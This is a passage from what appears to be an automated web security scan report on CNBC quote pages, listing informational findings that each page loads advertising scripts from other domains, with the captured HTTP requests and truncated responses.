Path:   /quotes/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotes/ HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:09 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 127964
X-Aicache-OS: 64.210.194.247:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

20.15. http://data.cnbc.com/quotes/.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/.DJIA

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotes/.DJIA HTTP/1.1
Host: data.cnbc.com
Proxy-Connection: keep-alive
Referer: http://data.cnbc.com/quotes/.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_most_recent_quotes=.DJIA; s_cc=true; s_nr=1315339795979; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; cnbc_regional_cookie=US; cnbcStreamQuoteMasterToggleRememberSwitch=off

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:09:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 117730
X-Aicache-OS: 64.210.194.248:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
       <script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.16. http://data.cnbc.com/quotes/.DJIA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/.DJIA

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotes/.DJIA HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:35 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 117631
X-Aicache-OS: 64.210.194.247:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

20.17. http://data.cnbc.com/quotes/.DJIA/tab/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/.DJIA/tab/1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotes/.DJIA/tab/1 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:05:57 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 117692
X-Aicache-OS: 64.210.194.245:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

20.18. http://data.cnbc.com/quotes/.DJIA/tab/2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/.DJIA/tab/2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotes/.DJIA/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:06 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 117132
X-Aicache-OS: 64.210.193.97:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
       <script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.19. http://data.cnbc.com/quotes/.FCHI

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/.FCHI

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotes/.FCHI HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:19 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109733
X-Aicache-OS: 64.210.194.248:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
       <script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.20. http://data.cnbc.com/quotes/.FCHI/tab/2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/.FCHI/tab/2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotes/.FCHI/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:17 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109139
X-Aicache-OS: 64.210.194.246:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
       <script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.21. http://data.cnbc.com/quotes/.FTSE

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/.FTSE

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotes/.FTSE HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:27 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109621
X-Aicache-OS: 64.210.194.245:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

20.22. http://data.cnbc.com/quotes/.FTSE/tab/2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/.FTSE/tab/2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotes/.FTSE/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:11 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109120
X-Aicache-OS: 64.210.194.248:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
       <script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.23. http://data.cnbc.com/quotes/.GDAXI

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/.GDAXI

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotes/.GDAXI HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:14 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109813
X-Aicache-OS: 64.210.194.246:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
       <script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.24. http://data.cnbc.com/quotes/.GDAXI/tab/2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/.GDAXI/tab/2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotes/.GDAXI/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:48 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109216
X-Aicache-OS: 64.210.193.97:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
       <script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.25. http://data.cnbc.com/quotes/.N225

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/.N225

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotes/.N225 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:22 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109780
X-Aicache-OS: 64.210.193.97:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
       <script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.26. http://data.cnbc.com/quotes/.N225/tab/2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/.N225/tab/2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotes/.N225/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:21 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109182
X-Aicache-OS: 64.210.193.97:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
       <script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.27. http://data.cnbc.com/quotes/.SPX

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/.SPX

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotes/.SPX HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:44 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 118794
X-Aicache-OS: 64.210.194.245:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

20.28. http://data.cnbc.com/quotes/.SPX/tab/2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/.SPX/tab/2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotes/.SPX/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:51 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 118204
X-Aicache-OS: 64.210.194.245:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

20.29. http://data.cnbc.com/quotes/CN

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/CN

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotes/CN;SHI HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:27 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109980
X-Aicache-OS: 64.210.193.97:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
       <script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.30. http://data.cnbc.com/quotes/CN

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/CN

Issue detail

The response dynamically includes the following scripts from other domains (highlighted in the response below):
http://Ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/stage/global.js

Request

GET /quotes/CN;SHI/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:26 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109298
X-Aicache-OS: 64.210.194.245:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

20.31. http://data.cnbc.com/quotes/COMP

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /quotes/COMP

Issue detail

The response dynamically includes the following scripts from other domains (highlighted in the response below):
http://Ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://www.nbcudigitaladops.com/hosted/global_header.js
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js

Request

GET /quotes/COMP HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:08 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 113345
X-Aicache-OS: 64.210.194.246:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT


<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
